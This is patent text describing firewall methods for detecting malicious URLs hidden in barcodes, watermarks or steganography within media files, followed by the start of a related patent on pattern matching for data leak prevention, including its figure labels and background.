FIG. **1** illustrates an exemplary network architecture in accordance with an embodiment of the present invention. Network architecture **100** shown in FIG. **1** comprises a headquarters network **110**, multiple branch office networks **121** and **122**. The headquarters network **110** and branch office networks **121** and **122**, PC **123** and mobile phone **124** are connected through internetworks, such as the Internet **130**. Headquarters network **110** comprises multiple network appliances, such as local server **111***a*, PC **111***b*, laptop **111***c*, mobile phone **111***d* and other computing devices that are operatively coupled to each other through a Local Area Network (LAN), wherein the LAN is then operatively coupled with firewall **112** (or one or more other network security appliances) that enable access to Internet **130**. Firewall **112** separates the external computing environment, represented by Internet **130**, from the internal computing environment of headquarters network **110**. Firewall **112** may intercept or otherwise filter the communication between Internet **130** and the network appliances of headquarters network **110** and scan for malware, viruses or other high-risk network access. The internal structures of branch office networks **121** and **122** are omitted as they may be the same as that of headquarters network **110**.

In the exemplary network architecture shown in FIG. **1**, firewall **112** may be a rule-based security device that controls traffic going through its interfaces. Usually, firewall **112** may comprise multiple physical network interfaces, such as an internal interface with 4-24 or more Ethernet ports, 1-4 or more wide area network (WAN) interfaces, one demilitarized zone (DMZ) interface. Further, when the private network is separated into multiple virtual LANs (VLANs), firewall **112** may also define multiple virtual interfaces for each VLAN. Firewall **112** comprises a rule set that includes multiple rules that are created by the network administrator and controls the traffic passing through firewall **112**. In each rule, the traffic is identified by source interfaces, destination interfaces, source Internet Protocol (IP) addresses, destination IP addresses, users/user groups, devices and/or other parameters of the traffic. In one embodiment of the present invention, multiple interfaces of firewall **112** may be selected as the source/destination of traffic in a single rule. The multiple interfaces may include physical interfaces, virtual interfaces and/or zones of firewall **112**. Usually, multiple interfaces that belong to the same category may be selected as a source in a rule. For example, multiple VLAN interfaces may be selected as sources/destinations of the traffic in a rule. However, different categories of interfaces may be also allowed as sources/destinations of a traffic flow in a rule. For example, an internal interface and a WAN interface or a physical interface and a virtual interface may be selected in a rule as the sources/destinations of traffic. In this scenario, a warning message may be provided to the network administrator before the rule containing multiple categories of interfaces can be configured within firewall **112**. After the traffic flow is defined, an action controlling the traffic flow, such as accept or deny, is designated in each rule. In operation, all traffic going through interfaces of firewall **112** is captured by firewall **112**. The source interface, destination interface and other parameters of the captured traffic flow are matched with those of each rule of a rule set. The first matched rule in the rule set is typically used for controlling the traffic flow and the traffic flow is processed based on the action defined in the matched rule.

FIG. **2** is a flow diagram illustrating a method for scanning a media file containing imperceptible content at a security device in accordance with an embodiment of the present invention. In the present embodiment, a media file that is transmitted from a sender to an intended recipient is captured by a network security appliance, which is usually disposed at a border of a private network. The media file may be an image file, an audio file or a video file. The media file may contain an image representing a barcode or an embedded digital watermark that is imperceptible to human senses. In the following example it is assumed the media file is a barcode image that contains a malware URL (e.g., a URL suspected or confirmed to be associated with malicious activities and included on a URL blacklist).

At block **201**, a network security appliance (e.g., firewall **112**) captures network traffic (e.g., data packets) between senders and intended recipients. The network traffic may be incoming traffic or outgoing traffic of a private network.

At block **202**, a media file is extracted from the network traffic by the network security appliance. Usually, data packets of the network traffic are cached and then the media file may be reconstructed from the cached data packets.

At block **203**, after the media file is extracted, it is sent to an inspection engine to search for any unsafe information based on security policies of the network security appliance. The inspection engine may be responsible for carrying out antivirus protection, email filtering (antispam), web filtering, data leak prevention and the like. In context of the present example, the inspection engine may determine the media file at issue that includes embedded therein one or more hidden data items is unsafe without actually decoding the hidden data items. To determine whether the media file contains unsafe data items embedded therein, the inspection engine

may match the media file with known unsafe media files that are collected by the network security appliance. The network security appliance may maintain an image database that collects known unsafe media files. The unsafe images may be collected from different sources. First, the network security appliance may maintain a list of malicious or unsafe URLs. The QR code or other barcode images of the malicious or unsafe URLs may be generated and stored in an unsafe media file database by the network security appliance. Second, after the network security appliance intercepts a media file that contains unsafe hidden data, the media file and/or a signature thereof may be stored in the unsafe media file database for future use. Third, suspicious media files with hidden data items may be submitted to the network security appliance by other users. The suspicious media files may be decoded and scanned for one or more hidden data items by the network security appliance and may be stored to the unsafe media files database if one or more hidden data items are found and determined to be unsafe. The suspicious media files database may be stored locally at the network security appliance or remotely at other servers or in cloud storage, which may be shared by multiple network security appliances for performing hidden data inspection.

In one embodiment, a received image file may compared directly with the known unsafe images stored by the network security appliance. Various algorithms for matching/comparing images are well known in the art. For example, keypoint matching, the histogram method, a pixel-based identical check and/or a block-based identical check may be used to match the received image file with images in the database. If the received image file matches a known unsafe image within a predetermined or configurable degree of certainty, it is determined that an unsafe hidden data item exists in the image file. In another embodiment, a signature of the received media file may be generated and matched with signatures of the unknown unsafe media files as described further below with reference to FIG. **3**.

At block **204**, the received media file is decoded and a hidden data item may be extracted. The network security appliance may scan the decoded hidden data item for any malware, unsafe URLs, sensitive information and/or unlawful content. The hidden data item may be inspected based on security policies as described further below with reference to FIG. **4**.

At block **205**, based on the results of the inspections of blocks **203** and **204**, the inspection engine determines whether the media file is safe. In the context of the present example, both the pre-match inspection of block **203** and the inspection after decoding of block **204** are employed. In alternative embodiments, either of the two inspection methodologies described above may be used independently or in combination with other inspection methodologies for scanning for unsafe hidden data items in media files.

At block **206**, the network security appliance may block transmission of the media file to the intended recipient. Optionally, a warning message indicating that an unsafe hidden data item has been found may be sent to the network administrator or the intended recipient.

FIG. **3** is a flow diagram illustrating a method for checking human imperceptible content by comparing a signature of a media file in accordance with an embodiment of the present invention. In the present embodiment, the media file is checked for an unsafe hidden data item without decoding the human imperceptible content. When decoding of the human imperceptible content of the media file is too time-consuming, the media file may be filtered by inspecting its signature before it is decoded for further inspection.

At block **301**, a signature of the received media file may be generated by a network security appliance (e.g., firewall **112**). The signature may be a cryptographic hash value, such as a Message Digest 5 (MD5) value or a Secure Hash Algorithm (SHA) value. The hash value may also be an average or perceptual hash value that is derived from various features of the content of the media file.

At block **302**, the network security appliance may check the signature of the media file against a signature database that contains signatures of known unsafe media files. Depending upon the particular implementation, the signature database may also or alternatively include signatures of known safe media files. As mentioned in the embodiment shown by FIG. **2**, the network security appliance may maintain an unsafe media file database. The network security appliance may generate signatures of the unsafe media files and store the signatures in the database for future inspection. In some embodiments, checking the signature of the media file in a signature database may be conducted by a hardware-based content processor that supports signature-based patterns. The hardware-based content processor may match the signature of the media file with multiple (e.g., over 30,000) signatures in the database simultaneously, by utilizing hardware-friendly blooming filters and hash functions. The hardware-based content processor may speed up the whole system significantly.

At block **303**, the network security appliance may determine if the signature of the received media file has been found in the signature database. If the signature is found in a signature database containing signatures of only known unsafe media files, then the received media file is a known unsafe file that contains a hidden data item.

An appropriate action is then taken based on the security policy. For example, the media file may be blocked or a warning message may be sent to the intended recipient or the network administrator at block **304**. If an average hash value or perceptual hash value is used, then if the signature of the media file is near enough to a signature of a known unsafe media file, the media file may be determined to be the known unsafe media file with some variations and may be blocked by the network security appliance.

FIG. **4** is a flow diagram illustrating a method for checking human imperceptible content by decoding the human imperceptible content in accordance with an embodiment of the present invention. The embodiment shown in FIG. **3** can identify an unsafe media file when the same media file has been found before. It is possible that an unsafe image file may be changed sufficiently so as not to be identified by comparison with previously observed known unsafe image files. In the present embodiment, the human imperceptible content embedded in the received media file is decoded so that the human imperceptible content may be evaluated.

At block **401**, the received media file is sent to a decode module of the inspection engine. The decode module may detect the type of the media file and call a corresponding decoding function to obtain the human imperceptible contents. For example, if the media file is an image file, it may be sent to a barcode decoder to read out the encoded data. The barcode decoder may support multiple image formats, including, but not limited to, as Portable Network Graphics (PNG), Joint Photographic Experts Group (JPEG), JPEG 2000, Exchangeable image file format (Exif), raw image format (RAW), Graphics Interchange Format (GIF), Tagged Image File Format (TIFF) and Windows Bitmap image file format (BMP). The barcode decoder may read out barcode in various barcode formats, including, but not limited to, Universal Product Code (UPC)-A, UPC-E, International

Article Number (EAN)-8, EAN-13, Code 39, Code 128, QR Code, Data Matrix, PDF417, Interleaved 2 of 5 (ITF) and IFT-14. The image file may also be sent to a watermark decoder to read out one or more image watermarks. Similarly, audio or video files may be sent to corresponding decoders to read out one or more audio/video watermarks.

At block **402**, if a hidden data item is identified by the decoder, the hidden item is scanned locally based at least on one or more security policies of the network security appliance. For example, if a security policy is a web filter that blocks a website, then the decoded hidden data is scanned to check if the hidden data includes a URL associated with or redirecting to a blocked website. If a security policy is a sensitive information (e.g., social security numbers, credit card numbers, etc.) filter, the decoded hidden data is scanned for such sensitive information. If a keyword filter is configured in the network security appliance, the decoded data may be scanned for designated keywords. Other policies that monitor the transmission of watermarks or steganographic data may be configured so that media files that are embedded with watermarks or steganographic data may be blocked from transmission. It will be apparent to one of ordinary skill in the art that the decoded data may be checked by one or more of an Intrusion Prevention System (IPS) engine for antivirus protection, email filtering (antispam), web filtering and data leak prevention.

At block **403**, the media file may be sent to a remote or cloud-based network security appliance for further deep inspection. Usually, a local virus or spam signature database contains only a part of all known virus or spam signatures, so that the scanning may be carried out quickly. Local signature databases may also fail to be updated in a timely manner. Therefore, if no threat is found by the local network security appliance, the media file or its signature may be sent to a remote or cloud-based network security appliance for further evaluation. Alternatively or additionally, if the local network security appliance is unable to decode the media file, the media file may be decoded by a more powerful decoder and a deeper inspection into the decoded hidden data may be performed by a remote network security appliance.

At block **404**, the network security appliance determines if the hidden data is safe based on the inspections of blocks **402** and **403**.

At block **405**, the media file is blocked from transmission or a warning message may be sent to the intended recipient or the network administrator if the hidden data is not safe.

FIG. **5** illustrates exemplary functional units of a network security appliance in accordance with an embodiment of the present invention. In the present embodiment, a network system comprises a sender **510**, a firewall **500** and a receiver (intended recipient) **550**. Network traffic from sender **510** to receiver **550** is captured by firewall **500**. Firewall **500** comprises a network module **540** and an IPS **520**. Network module **540** is used for capturing data packets between sender **510** and receiver **550**. After data packets are captured, IPS **520** may scan them based on security policies of firewall **500**. If the data packets violate any security policy, they may be blocked by firewall **500**.

In the present embodiment, IPS **520** comprises a media extracting module **521** and a hidden data detector **530**. The data packets captured by network module **540** may be cached by media extracting module **521**. A media file that is sent from sender **510** may be reconstructed from the cached data packets. After the media file is extracted, hidden data detector **530** may scan it based on security policies of firewall **500**.



Hidden data detector **530** is used for detecting if the media file contains any hidden data item that should be blocked based on different algorithms. Hidden data detector **530** may comprise multiple functional modules that may check hidden data item in the media file with or without decoding the hidden data item contained within the media file. Hidden data detector **530** may comprise a media file database **531**, a signature generating module **532**, a signature matching module **533** and a signature DB **534**, which scans the media file based on a signature matching algorithm without decoding the hidden data item from the media file. Hidden data detector **530** may further comprise a decoding module **535**, a content control module **536** and a content policy registry **537** that scans the media file by decoding a hidden data item contained within the media file. It will be appreciated by one of ordinary skill in the art will appreciate that any or all of the scanning algorithms described herein and/or other image matching techniques may be used for determining if a hidden data item is embedded in media file and if the media file is safe or not. The functional modules for the hidden data item scanning are described in detail below.

Media file DB **531** comprises known unsafe media files that are collected by firewall **500**. These unsafe media files contain hidden content embedded within the media files. The hidden content may be encoded as barcodes or digital watermarks that are imperceptible by human senses. URLs that direct a user device to access an unsafe website or carry out unsafe operations may be encoded and hidden in the media files. Sensitive information, such as personal information, that is encoded within a QR code may be embedded in an image file and transmitted without permission by the owners. The hidden content may also comprise digital watermarks that identify the existence of proprietary information, intellectual property rights and/or the owner of the media file. The unsafe media files may be intercepted by the firewall or submitted by other users for inspection.

Signature DB **534** comprises signatures or fingerprints of unsafe media files that are known to the firewall **500**. A signature or fingerprint may be a cryptographic hash value, including, but not limited to a Message Digest 5 (MD5) value or a Secure Hash Algorithm (SHA) value of a known unsafe media file. Optionally, the signature or fingerprint may be an average hash value or a perceptual hash value that is derived from various features of the content of the media file. The signature or fingerprint may be other fingerprints that are comparable with image matching algorithms. In the present embodiment, a signature or fingerprint of each media file in the image DB **532** may be generated by signature generating module **532** and stored in signature DB **534**. Signature DB **534** may also be downloaded from a server that collects signatures of unsafe media files.

It will be appreciated by one of ordinary skill in the art that media file DB **531** and signature DB **534** may be stored locally at firewall **500** so that the searching for known unsafe media files may be conducted quickly. Optionally, media file DB **531** and signature DB **534** may be stored remotely from firewall **500**. These databases may be maintained by and shared among multiple firewalls so that more unsafe media files may be identified.

Signature generating module **532** is used for generating a signature or fingerprint for the media file that is extracted by media extracting module **521**. The signature may be a cryptographic hash value, e.g., MD5 or SHA value, of the extracted media file. By comparing the cryptographic hash value of the present media file with hash values of known unsafe media files, hidden data detector **530** may determine if the same media file has been identified as an unsafe file

before. However, it is possible that the received media file and a known unsafe media file in media file DB **531** contain the same unsafe hidden content, but the files are not identical. For example, the received media file and a known unsafe media file have the same content but saved in different format or the received media file may have been generated by scaling, distorting or other modification of the known unsafe image file. In these cases, cryptographic hash values of the received media file and the known unsafe media file will not match, but average or perceptual hash values may be used to find the degree of similarity of two images. If the average or perceptual hash value of the received media file is the same as or similar to the perceptual hash value of a known unsafe file, the received file may also be identified as an unsafe file.

Signature matching module **533** is used for searching the signature or fingerprint of the received media file in signature DB **534**. If the signature is found or matched with a signature in the signature DB **534**, the media file is identified as unsafe and IPS **520** may inform network module **540** to block the media file from transmission to receiver **550** and may send a warning message to receiver **550** or network administrator.

If a signature of the received media file is not found in signature DB **534**, the media file may be sent to decoding module **535** so that the hidden data item of the media file may be decoded. Decoding module **535** may be a barcode reader supporting multiple barcode formats, such as UPC-A, UPC-E, EAN-8, EAN-13, Code 39, Code 128, QR Code, Data Matrix, PDF 417 and ITF. Decoding module **535** may be a digital watermark identifier. By scanning the media file, one or more digital watermarks that are encoded in the media file may be identified by decoding module **535**. The digital watermark may be special text, audio or logo embedded by an IP right owner of the media file. The watermark may also include sensitive information or illegal content embedded by someone who wants to hide such content from firewall checking.

After the hidden data item is decoded from the media file, content control module **536** scans the hidden data item based on corresponding scan policies in content policy registry **537**. In one embodiment, if the hidden data is a URL and a website filter is configured in content policy registry **537**, content control module **536** scans the URL based on the website filter. If the URL is not allowable, the media file is blocked. In another embodiment, if the hidden data contains text and a keyword filter or sensitive information filter is configured, the text is scanned based on the filters. When a forbidden keyword or sensitive information is detected by content control module **536**, the media file may be blocked. Content control module **536** may also check the digital watermarks decoded from the media file based on corresponding security policies.

Further, after the hidden data in a media file is decoded and identified as unsafe based on a security policy, the media file may be stored in media file DB **531** and the signature thereof may be stored in signature DB **534** for use in connection with future pre-match signature scanning.

FIG. **6** is an example of a computer system **600** with which embodiments of the present disclosure may be utilized. Computer system **600** may represent or form a part of a network appliance, a server or a client workstation.

Embodiments of the present disclosure include various steps, which will be described in more detail below. A variety of these steps may be performed by hardware components or may be tangibly embodied on a computer-readable storage medium in the form of machine-executable instructions, which may be used to cause a general-purpose or special-purpose processor programmed with instructions to perform these steps. Alternatively, the steps may be performed by a combination of hardware, software, and/or firmware.



As shown, computer system **600** includes a bus **630**, a processor **605**, communication port **610**, a main memory **615**, a removable storage media **640**, a read only memory **620** and a mass storage **625**. A person skilled in the art will appreciate that computer system **600** may include more than one processor and communication ports.

Examples of processor **605** include, but are not limited to, an Intel® Itanium® or Itanium 2 processor(s), or AMD® Opteron® or Athlon MP® processor(s), Motorola® lines of processors, FortiSOC™ system on a chip processors or other future processors. Processor **605** may include various modules associated with embodiments of the present invention.

Communication port **610** can be any of an RS-232 port for use with a modem based dialup connection, a 10/100 Ethernet port, a Gigabit or 10 Gigabit port using copper or fiber, a serial port, a parallel port, or other existing or future ports. Communication port **610** may be chosen depending on a network, such a Local Area Network (LAN), Wide Area Network (WAN), or any network to which computer system **600** connects.

Memory **615** can be Random Access Memory (RAM), or any other dynamic storage device commonly known in the art. Read only memory **620** can be any static storage device(s) such as, but not limited to, a Programmable Read Only Memory (PROM) chips for storing static information such as start-up or BIOS instructions for processor **605**.

Mass storage **625** may be any current or future mass storage solution, which can be used to store information and/or instructions. Exemplary mass storage solutions include, but are not limited to, Parallel Advanced Technology Attachment (PATA) or Serial Advanced Technology Attachment (SATA) hard disk drives or solid-state drives (internal or external, e.g., having Universal Serial Bus (USB) and/or Firewire interfaces), such as those available from Seagate (e.g., the Seagate Barracuda 7200 family) or Hitachi (e.g., the Hitachi Deskstar 7K1000), one or more optical discs, Redundant Array of Independent Disks (RAID) storage, such as an array of disks (e.g., SATA arrays), available from various vendors including Dot Hill Systems Corp., LaCie, Nexsan Technologies, Inc. and Enhance Technology, Inc.

Bus **630** communicatively couples processor(s) **605** with the other memory, storage and communication blocks. Bus **630** can be, such as a Peripheral Component Interconnect (PCI)/PCI Extended (PCI-X) bus, Small Computer System Interface (SCSI), USB or the like, for connecting expansion cards, drives and other subsystems as well as other buses, such a front side bus (FSB), which connects processor **605** to system memory.

Optionally, operator and administrative interfaces, such as a display, keyboard, and a cursor control device, may also be coupled to bus **630** to support direct operator interaction with computer system **600**. Other operator and administrative interfaces can be provided through network connections connected through communication port **610**.

Removable storage media **640** can be any kind of external hard-drives, floppy drives, IOMEGA® Zip Drives, Compact Disc-Read Only Memory (CD-ROM), Compact Disc-Re-Writable (CD-RW), Digital Video Disk-Read Only Memory (DVD-ROM).

Components described above are meant only to exemplify various possibilities. In no way should the aforementioned exemplary computer system limit the scope of the present disclosure.

While embodiments of the invention have been illustrated and described, it will be clear that the invention is not limited to these embodiments only. Numerous modifications, changes, variations, substitutions, and equivalents will be apparent to those skilled in the art, without departing from the spirit and scope of the invention, as described in the claims.

What is claimed is:

**1**. A method comprising:

capturing network traffic by a firewall device associated with a private network, wherein the network traffic is directed to an intended recipient associated with the private network;

extracting, by the firewall device, a media file from the network traffic;

determining, by the firewall device, presence of a potentially malicious hidden data item embedded in the media file, wherein the potentially malicious hidden data item comprises encoded data within one or more of a digital watermark, steganography and a barcode;

determining whether the potentially malicious hidden data item violates a security policy of a plurality of security policies of the private network enforced by the firewall device by decoding the encoded data and applying a content filter to a result of the decoding, wherein the content filter comprises a Uniform Resource Locator (URL) filter and wherein the security policy contains information indicative of a URL known to be associated with malicious activities; and

when said determining whether the potentially malicious hidden data item violates a security policy is affirmative, then performing by the firewall device (i) blocking transmission of the media file to the intended recipient, (ii) causing the intended recipient to be alerted regarding the violated security policy and (iii) causing a network administrator of the private network to be alerted regarding the violated security policy.

**2**. The method of claim **1**, wherein the security policy contains information indicative of a URL associated with a blacklisted website.

**3**. The method of claim **1**, wherein the security policy contains information indicative of a URL that redirects to or is otherwise associated with a blacklisted website.

**4**. The method of claim **1**, further comprising determining presence of the potentially malicious hidden data item by matching a signature of the media file against a plurality of signatures of media files known to include unsafe hidden data.

**5**. The method of claim **1**, further comprising determining presence of the potentially malicious hidden data item by performing content inspection processing on the media file.

**6**. The method of claim **1**, further comprising determining presence of the potentially malicious hidden data item by sending the media file or information regarding the media file to a remote or cloud-based network security appliance external to the private network.

**7**. The method of claim **1**, wherein the media file comprises an image file or a video file.



**8**. The method of claim **1**, wherein the barcode comprises a linear barcode or a matrix barcode.

**9**. A firewall device comprising:

a non-transitory storage device having embodied therein one or more routines; and

one or more processors coupled to the non-transitory storage device and operable to execute the one or more routines to perform a method comprising:

capturing network traffic directed to an intended recipient associated with a private network protected by the firewall device;

extracting a media file from the network traffic;

determining presence of a potentially malicious hidden data item embedded in the media file, wherein the potentially malicious hidden data item comprises encoded data within one or more of a digital watermark, steganography and a barcode;

determining whether the potentially malicious hidden data item violates a security policy of a plurality of security policies of the private network enforced by the firewall device by decoding the encoded data and applying a content filter to a result of the decoding, wherein the content filter comprises a Uniform Resource Locator (URL) filter and wherein the security policy contains information indicative of a URL known to be associated with malicious activities; and

when said determining whether the potentially malicious hidden data item violates a security policy is affirmative, then (i) blocking transmission of the media file to the intended recipient, (ii) causing the intended recipient to be alerted regarding the violated security policy and (iii) causing a network administrator of the private network to be alerted regarding the violated security policy.

**10**. The firewall device of claim **9**, wherein the security policy contains information indicative of a URL associated with a blacklisted website.

**11**. The firewall device of claim **9**, wherein the security policy contains information indicative of a URL that redirects to or is otherwise associated with a blacklisted website.

**12**. The firewall device of claim **9**, further comprising determining presence of the potentially malicious hidden data item by matching a signature of the media file against a plurality of signatures of media files known to include unsafe hidden data.

**13**. The firewall device of claim **9**, wherein the method further comprises determining presence of the potentially malicious hidden data item by performing content inspection processing on the media file.

**14**. The firewall device of claim **9**, wherein the method further comprises determining presence of the potentially malicious hidden data item by sending the media file or information regarding the media file to a remote or cloud-based network security appliance external to the private network.

**15**. The firewall device of claim **9**, wherein the media file comprises an image file or a video file.

**16**. The firewall device of claim **9**, wherein the barcode comprises a linear barcode or a matrix barcode.

* * * * *

# APPENDIX G

US010354088B2

(12) **United States Patent**
**Zheng**

(10) **Patent No.: US 10,354,088 B2**
(45) **Date of Patent: *Jul. 16, 2019**

(54) **PATTERN MATCHING FOR DATA LEAK PREVENTION**

(71) Applicant: **Fortinet, Inc.**, Sunnyvale, CA (US)

(72) Inventor: **Juneng Zheng**, Fremont, CA (US)

(73) Assignee: **Fortinet, Inc.**, Sunnyvale, CA (US)

( * ) Notice: Subject to any disclaimer, the term of this patent is extended or adjusted under 35 U.S.C. 154(b) by 0 days.

This patent is subject to a terminal disclaimer.

(21) Appl. No.: **16/052,464**

(22) Filed: **Aug. 1, 2018**

(65) **Prior Publication Data**

US 2018/0373888 A1 Dec. 27, 2018

**Related U.S. Application Data**

(63) Continuation of application No. 14/981,528, filed on Dec. 28, 2015, now Pat. No. 10,083,318.

(51) **Int. Cl.**
***G06F 21/62*** (2013.01)
***G06F 16/9535*** (2019.01)
***G06F 16/2457*** (2019.01)

(52) **U.S. Cl.**
CPC .... ***G06F 21/6245*** (2013.01); ***G06F 16/24575*** (2019.01); ***G06F 16/9535*** (2019.01)

(58) **Field of Classification Search**
CPC ......... G06F 17/30528; G06F 17/30867; G06F 21/6245; G06N 5/02; H04L 63/0236; H04L 63/0245; H04L 63/0254; H04L 63/0263; H04L 63/08; H04L 63/1408; H04L 63/1416; H04L 63/166; H04L 63/168
See application file for complete search history.

(56) **References Cited**

U.S. PATENT DOCUMENTS

| | | | | |
|---|---|---|---|---|
| 8,738,860 | B1 | 5/2014 | Griffin et al. | |
| 8,818,923 | B1 | 8/2014 | Hoffmann | |
| 8,862,603 | B1 | 10/2014 | Watson et al. | |
| 8,959,047 | B2 | 2/2015 | Perlmutter et al. | |
| 10,083,318 | B2 | 9/2018 | Zheng | |
| 2012/0011084 | A1 | 1/2012 | Gulwani et al. | |
| 2012/0017159 | A1* | 1/2012 | Roh | G06F 3/04812 715/760 |

(Continued)

OTHER PUBLICATIONS

Notice of Allowance for U.S. Appl. No. 14/981,528 dated Jun. 28, 2018.

(Continued)

*Primary Examiner* — Abiy Getachew

(74) *Attorney, Agent, or Firm* — Jaffery Watson Mendonsa & Hamilton LLP

(57) **ABSTRACT**

Systems and methods for preprocessing data to facilitate DLP pattern matching are provided. An input string is received by a Data Leak Prevention (DLP) system. The input string is converted by the DLP system into a fixed string pattern. The conversion is performed based on one or more of multiple class definitions, including a digit class, a letter class and a symbol class. A determination is then made by the DLP system regarding whether the input string contains potential sensitive data to which a full-match is to be applied by matching the fixed string pattern against one or more stored target strings representative of sensitive data.

**22 Claims, 8 Drawing Sheets**






(56) **References Cited**

U.S. PATENT DOCUMENTS

| | | | | |
|---|---|---|---|---|
| 2013/0304690 | A1* | 11/2013 | Perlmutter | G06N 5/02 706/48 |
| 2014/0380471 | A1 | 12/2014 | Levow et al. | |
| 2015/0178021 | A1* | 6/2015 | Shimizu | G06F 3/1204 358/1.9 |
| 2017/0185799 | A1 | 6/2017 | Zheng | |

OTHER PUBLICATIONS

Non-Final Rejection for U.S. Appl. No. 14/981,528 dated Jan. 25, 2018.
Non-Final Rejection for U.S. Appl. No. 14/981,528 dated Jul. 13, 2017.

* cited by examiner


Server Computing System 120
Network Share 122
Client Computing System 102-3
DLP Agent 110-3
Client Computing System 102-2
DLP Agent 110-2
Network 116
Network Device 118
Client Computing System 102-1
DLP Agent 110-1
DLP Policy 112
Local Data Store 114
Applications 104
External Device Interfaces 106
Network Interface 108
100

FIG. 1A


150
NETWORK
152
WORKSTATION
154-1
HOST-BASED DLP MODULE
156-1
WORKSTATION
154-2
HOST-BASED DLP MODULE
156-2
SERVER
158
HOST-BASED DLP MODULE
156-3
GATEWAY
160
NETWORK-BASED DLP MODULE
162
EXTERNAL NETWORK(S)
164

FIG. 1B


200
INPUT STRING RECEIVE MODULE
202
FIXED STRING PATTERN BASED CONVERSION MODULE
204
PRE-MATCH IMPLEMENTATION MODULE
206
FULL-MATCH IMPLEMENTATION MODULE
208

FIG. 2


300
SSN: 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
302-1
Birthday: 12/18/1988
302-2
Tel: (408)888-9999
302-3
California Vehicle Registration Plates: 6SAM888
302-4
American Express: 4444-666666-55555
302-5
International Bank Account Number: GB29 NWBK 6016 1331 9268 19
302-6
Apply One or More Predefined Common Class Based Functions
304
ABC: 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
306-1
Aabcdefg: 01/01/0123
306-2
Aab: (012)012-0123
306-3
Aabcdefghi abcdefg abcdefghijkl abcdef: 0ABC012
306-4
Aabcdefg Aabcdef: 0123-012345-01234
306-5
Aabcdefghijk Aabc Aabcdef Aabcde: AB01 ABCD 0123 0123 0123 01
306-6

FIG. 3


400
SSN: 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
402-1
Birthday: 12/18/1988
402-2
Tel: (408)888-9999
402-3
California Vehicle Registration Plates: 6SAM888
402-4
American Express: 4444-666666-55555
402-5
International Bank Account Number: GB29 NWBK 6016 1331 9268 19
402-6
CLASS DEFINITION AND CONSECUTIVE COUNT BASED FUNCTIONS
404
U3: D3-D2-D4
406-1
UL7: D2/D2/D4
406-2
UL2: (D3)D3-D4
406-3
UL9 UL6 UL11 UL5: DU3D3
406-4
UL7 UL7: D4-D6-D5
406-5
UL11 UL3 UL6 UL5: U2D2 U4 D4 D4 D4 D4 D2
406-6
PATTERN DATABASE
408
PATTERN MATCHING
410-1
PATTERN MATCHING
410-2
PATTERN MATCHING
410-3
PATTERN MATCHING
410-4
PATTERN MATCHING
410-5
PATTERN MATCHING
410-6

FIG. 4


500
RECEIVING, AT A DATA LEAK PREVENTION (DLP) SYSTEM, AN INPUT STRING
502
CONVERTING, BY THE DLP SYSTEM, THE INPUT STRING INTO A FIXED STRING PATTERN BASED ON MULTIPLE CLASS DEFINITIONS INCLUDING A DIGIT CLASS, A LETTER CLASS AND A SYMBOL CLASS
504
DETERMINING, BY THE DLP SYSTEM, WHETHER THE INPUT STRING CONTAINS POTENTIAL SENSITIVE DATA TO WHICH A FULL-MATCH IS APPLIED BY MATCHING THE FIXED STRING PATTERN AGAINST ONE OR MORE STORED TARGET STRINGS REPRESENTATIVE OF SENSITIVE DATA
506

FIG. 5


600
RECEIVING, AT A DATA LEAK PREVENTION (DLP) SYSTEM, AN INPUT STRING
602
FOR EACH CHARACTER POSITION WITHIN THE INPUT STRING, IDENTIFYING A MATCHING CLASS FOR A CHARACTER AT THE CHARACTER POSITION WITHIN THE INPUT STRING
604
REPLACING THE CHARACTER AT THE CHARACTER POSITION WITHIN THE INPUT STRING WITH A SINGLE CHARACTER ASSOCIATED WITH THE MATCHING CLASS FOLLOWED BY AN INTEGER VALUE INDICATIVE OF CONSECUTIVE MATCHES TO THE MATCHING CLASS
606

FIG. 6A


650
RECEIVING, AT A DATA LEAK PREVENTION (DLP) SYSTEM, AN INPUT STRING
652
FOR EACH CHARACTER POSITION WITHIN THE INPUT STRING, IDENTIFYING A MATCHING CLASS FOR A CHARACTER AT THE CHARACTER POSITION WITHIN THE INPUT STRING
654
REPLACING THE CHARACTER AT THE CHARACTER POSITION WITHIN THE INPUT STRING WITH A CURRENT REPLACEMENT CHARACTER OF MULTPLE CHARACTERS ASSOCIATED WITH THE MATCHING CLASS
656
REPLACING THE CHARACTER AT THE CHARACTER POSITION WITHIN THE INPUT STRING WITH A CURRENT REPLACEMENT CHARACTER OF ONE OF THE MULTPLE CHARACTERS ASSOCIATED WITH THE MATCHING CLASS
656

FIG. 6B


700
MAIN MEMORY
715
READ-ONLY MEMORY
720
MASS STORAGE DEVICE
725
EXTERNAL STORAGE DEVICE
740
BUS 730
COMMUNICATION PORT(S)
710
PROCESSOR
705

FIG. 7

# PATTERN MATCHING FOR DATA LEAK PREVENTION

## CROSS-REFERENCE TO RELATED PATENTS

This application is a continuation of U.S. patent application Ser. No. 14/981,528, filed on Dec. 28, 2015, now U.S. Pat. No. 10,083,318, which is hereby incorporated by reference in its entirety for all purposes.

## COPYRIGHT NOTICE

Contained herein is material that is subject to copyright protection. The copyright owner has no objection to the facsimile reproduction of the patent disclosure by any person as it appears in the Patent and Trademark Office patent files or records, but otherwise reserves all rights to the copyright whatsoever. Copyright © 2015-2018, Fortinet, Inc.

## BACKGROUND

### Field

Embodiments of the present invention generally relate to network and data security technology. In particular, embodiments of the present invention relate to high performance pattern matching for data leakage detection and prevention and preprocessing of data to facilitate data leak prevention (DLP) pattern matching.

### Description of the Related Art

One of the primary concerns of every user and organization connected over the Internet in this age of Information Technology (IT) is data security and prevention of data leakage. Data privacy and data leak prevention (DLP) are therefore among the key concerns for any organization as computing devices within a network may contain sensitive data/information that, if not protected effectively, can be transferred to anyone and anywhere across the globe in very little time. Such sensitive data can include information relating to customers, bank account details, credit card details, social security numbers, dates of birth and the like. For an organization, such data can include sales contracts, customer lists, supplier lists, future product details, financial information, deliveries, supplies, medical records, employee details, manufacturing details, Intellectual Properties, Trade Secrets and the like.

